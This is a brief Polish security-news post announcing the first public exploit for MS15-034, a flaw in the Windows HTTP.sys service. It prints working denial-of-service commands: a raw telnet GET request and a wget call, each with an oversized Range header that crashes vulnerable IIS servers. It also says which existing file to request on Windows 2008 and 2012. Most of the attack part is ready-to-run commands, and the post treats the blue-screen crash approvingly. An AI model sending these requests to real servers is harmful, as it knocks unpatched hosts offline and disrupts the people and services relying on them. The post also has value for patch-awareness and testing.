Pierwszy exploit na MS15-034

Wygląda na to, że mamy pierwszego prostego exploita na poważny błąd w usłudze HTTP w systemach Windows. Na razie to tylko DoS, czekamy dalej na kod prowadzący do RCE. Aby wywołać piękny niebieski ekran trzeba wykonać następującą sekwencję komend:
Bash:
telnet target 80
GET /iis-85.png HTTP/1.1
Host: cokolwiek
Range: bytes=18-18446744073709551615

lub na przykład
Bash:
wget --header="Range: bytes=18-18446744073709551615 http://192.168.0.28/welcome.png"
Wywołanie GET musi prowadzić do istniejącego pliku, zatem dla Windows 2012 będzie to iis-85.png, a dla Windows 2008 welcome.png. Dalsze dyskusje na temat możliwości wykorzystania błędu oraz exploitów możecie znaleźć na stronach Metasploit, rootsec orazma.ttias.be a w serwisie xpaw znajdziecie zdalny tester podatności.

azaufanatrzeciastrona.pl_wp_content_uploads_2015_04_iis_580x363.png